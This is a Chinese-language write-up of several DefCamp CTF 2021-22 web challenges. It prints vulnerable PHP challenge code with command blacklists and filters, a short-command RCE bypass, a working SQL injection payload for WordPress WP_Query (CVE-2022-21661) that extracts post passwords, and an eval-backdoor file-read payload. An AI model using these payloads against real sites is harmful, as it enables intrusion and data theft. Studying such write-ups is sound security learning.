DefCamp Capture the Flag (D-CTF) 2021-22 web

前言

抽空看了下web

para-code

4长度rce需要有写权限，但是题目没有写权限，只能爆破一下后面的命令

<?php
require __DIR__ . '/flag.php';
if (!isset($_GET['start'])){
    show_source(__FILE__);
    exit;
} 

$blackList = array(
  'ss','sc','aa','od','pr','pw','pf','ps','pa','pd','pp','po','pc','pz','pq','pt','pu','pv','pw','px','ls','dd','nl','nk','df','wc', 'du'
);

$valid = true;
foreach($blackList as $blackItem)
{
    if(strpos($_GET['start'], $blackItem) !== false)
    {
         $valid = false;
         break;
    }
}

if(!$valid)
{
  show_source(__FILE__);
  exit;
}

// This will return output only for id and ps. 
if (strlen($_GET['start']) < 5){
  echo shell_exec($_GET['start']);
} else {
  echo "Please enter a valid command";
}

if (False) {
  echo $flag;
}
?>

最后爆破出为 ?start=m4 *

linux m4 命令

m4 将输入拷贝到输出,同时将宏展开. 宏可以是内嵌的也可以是用户定义的. 除了可以展开宏,m4还有一些内建的函数,用来引用文件,执行Unix命令,整数运算,文本操作,循环等. m4既可以作为编译器的前端也可以单独作为一个宏处理器。

research-it

一个wordpress站点，经过扫描 /wp-content/plugins/ 存在目录遍历

wp-content 下面的文件目录

1. languages(语言包,中文什么的，可以安装其他语言包，也放这里)
2. plugins(各种插件，比如301插件，回复插件，自动邮件插件什么的)
3. themes(最新版本的wordpress默认有3个主题都是放这里，自己安装的主题也是放这里的)

wp-content下面一共就这3个目录

/wp-includes/wlwmanifest.xml 获得后台地址

尝试了一些基本的wordpress的漏洞均失败，突破点 hello.php存在备份文件能查看源码 hello.php~

发现了WP_Query ，前一段时间爆出一个sql注入 CVE-2022–21661

分析文章：某Press核心框架WP_Query SQL注入漏洞分析(CVE-2022–21661)

发现 add 的 action

有点不同的是，网上的poc是采用 json方式注入，这里改一下就完事了

payload：

action=Taxonomy&args[tax_query][0][field]=term_taxonomy_id&args[tax_query][0][terms][0]=1) and extractvalue(1,co
ncat(0x5e,(select substr((select group_concat(post_password) from wp_posts),10,40)),0x5e))#

casual-defence

一开始什么线索都没有，尝试apache的漏洞也没有成功，最后通过dirsearch 发现了一个疑点，访问 index.php时返回还是这个页面，说明后端为php，然后结合题目，网站被黑，怀疑存在后门函数，只不过需要自己fuzz参数，经过手动 fuzz，发现存在cmd参数命令执行，用Wfuzz也能出参数

Disable_function:

eval,passthru,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,shell_exec,get_defined_functions

发现执行了 ban了 eval，那么就是用了assert，php7环境下，无参读文件，取反也行

payload

?cmd=var_dump(file_get_contents(end(current(get_defined_vars()))));&y0ng=index.php

源码：

<?php
$note = "most of execution functions where blocked within the php.ini :D";
	
if (!isset($_GET['cmd'])){
	echo 'Hacked by NotRealH4ck3rN4m3! You shall not elevate me!';
} 
	
if(preg_match('/system|exec|passthru|shell|[\"\'\\\$\%\.\[\]\{\}\`\!\*\/]/', $_GET['cmd'])){
	echo "Try Harder!";
} else {
	eval($_GET['cmd']);
}
$flag = "CTF{40c7bf1cd2186ce4f14720c4243f1e276a8abe49004b788921828f13a026c5f1}";
?>

然后发现用的是 eval ，不是ban了吗，网上查到的原因：

在php.ini中，有个disable_functions项目，可以用于设置要禁用的php函数。但是却不能禁用eval函数。是因为eval并不是php的函数，而是zend的函数。

要想禁用eval函数需要使用 Suhosin php插件，php 禁用eval( )函数

it-support

Laravel v8.83.0 (PHP v7.3.33)

首页：

提交抓包：

测出xss，但是貌似没什么用

观察生成的ticket

这个是ticket的格式是这样的：TK-(year)(month)(day)(minutes)(second)-1xxx

当我刷新页面时只有时间和状态发生了变化，时间有大概两三秒的差别，状态从penting变为closed

然后就是一直爆破 ticket 的秒和后面的1xxx，我没爆出来